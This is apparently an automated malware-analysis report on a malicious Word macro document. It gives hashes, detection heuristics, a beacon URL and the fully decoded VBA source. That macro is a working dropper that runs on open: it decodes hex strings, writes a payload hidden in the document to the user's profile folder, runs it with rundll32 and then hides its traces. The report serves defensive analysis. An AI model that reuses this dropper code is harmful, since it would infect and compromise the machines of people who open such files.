Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1f76637bdb839db7…

MALICIOUS

Office (OOXML)

Size: 260.3 KB
Created: 2014-11-05 12:44:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2020-12-25
MD5: cfb4be91d8546203ae602c0284126408
SHA-1: adf8fb385de26985ed8b40d09fbedccc0f42332e
SHA-256: 1f76637bdb839db7b43be7284b9b6482827529ac14406659a373ab3521651a2f
Risk Score: 266

Heuristics 9

  • ClamAV: Doc.Trojan.Xshell-6923080-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Xshell-6923080-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell rdl
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    pth = Environ(s2) & Chr(92)
  • Remote image (web beacon / tracking pixel) medium OOXML_IMAGE_BEACON
    Document references an external image URL — loads automatically on open, revealing IP address and timestamp to the server (used for phishing tracking and NTLM hash theft on corporate networks)
  • External relationship medium OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: http://main.windowskernel14.com/spl/image/Opr122Opn.jpg
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://main.windowskernel14.com/spl/image/Opr122Opn.jpg OOXML external relationship
    • http://www.arabkids.com/__dec/filepart2.aspx/index.jpg In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2847 bytes
SHA-256: 7b63db6c10ffec8799a1cd6e10feba550e160d8adfdae84131be18c5a04644b1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()
    getPicture 1
End Sub
Sub AutoOpen()
    getPicture 1
End Sub

Private Sub getPicture(Void As Integer)
bmw = "5553455250524F46494C45"
Dim s2 As String
ind = 1
While (ind < Len(bmw))
Dim bt As String
bt = Mid(bmw, ind, 2)
Dim tt As Integer
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
pth = Environ(s2) & Chr(92)
s2 = ""
s1 = "5C70696333342E676966"
ind = 1
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
With ActiveDocument
qtr = 20
kit = qtr / 2
pik = 2
With .Range
f = FreeFile()
DoEvents
jot = "0"
With .TextRetrievalMode
anosh = "http://www.arabkids.com/__dec/filepart2.aspx/index.jpg"
dc = Mid(anosh, 26, 4)
xmt = Mid(anosh, 44, 1)
fnm = "~$"
Dim a As Byte
fnm = fnm & "cache.doc"
.IncludeHiddenText = True
azb = 5
End With
DoEvents
aea = azb + 5
For q = 1 To qtr
bb = bb + "0"
Next q
End With
poi = Mid(anosh, 35, 1)
aei = aea - 2
dc = "," & dc
With .Sections(pik)
DoEvents
With .Range
poi = poi & Chr(qtr * 5 + 11)
DoEvents
With .Font
.Hidden = False
End With
aaa = .Text
DoEvents
For p = qtr To azb Step -1
anosh = Str(p)
pcc = jot + xmt
lamb = Trim(anosh)
If (p < kit) Then
kml = pcc + jot
aaa = Replace(aaa, kml + lamb, bb)
Else
ss = pcc + lamb
aaa = Replace(aaa, ss, bb)
End If
bb = Mid(bb, 2)
Next p
ozodo = pth & fnm & dc
poi = poi & Chr(qtr * 5 + 5)
If (Mid(aaa, azb - 4, azb - 2)) = poi Then
ghos = True
.Text = "."
End If
End With
With ActiveDocument
With .Sections
If (ghos) Then
Open pth & fnm For Binary As f
aaa = Replace(Mid(aaa, aei), " ", "")
s2 = ""
s1 = "72756E646C6C333220"
ind = 1
DoEvents
While (ind < Len(s1))
bt = Mid(s1, ind, 2)
On Error Resume Next
ij = CLng("&H" & bt)
s2 = s2 + Chr(ij)
ind = ind + 2
Wend
rdl = s2 & ozodo
DoEvents
For i = 1 To Len(aaa) - 2 Step 2
On Error Resume Next
ch = "&H" + Mid(aaa, i, 2)
a = ch
Put #f, , a
Next i
Close #f
DoEvents
Shell rdl
End If
ctn = .Count
End With
For i = 1 To ctn
With ActiveDocument
With .Sections(i)
With .Range
With .Font
If (i < pik) Then
.Hidden = True
Else
.Hidden = False
End If
End With
End With
End With
End With
Next i
End With
End With
.Save
End With
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 15872 bytes
SHA-256: 157d5c351f451bca1dbe81bc0cd70da372309b123079dc7b4552c8c574b95209
Detection
ClamAV: Doc.Trojan.Xshell-6923080-0
Obfuscation or payload: unlikely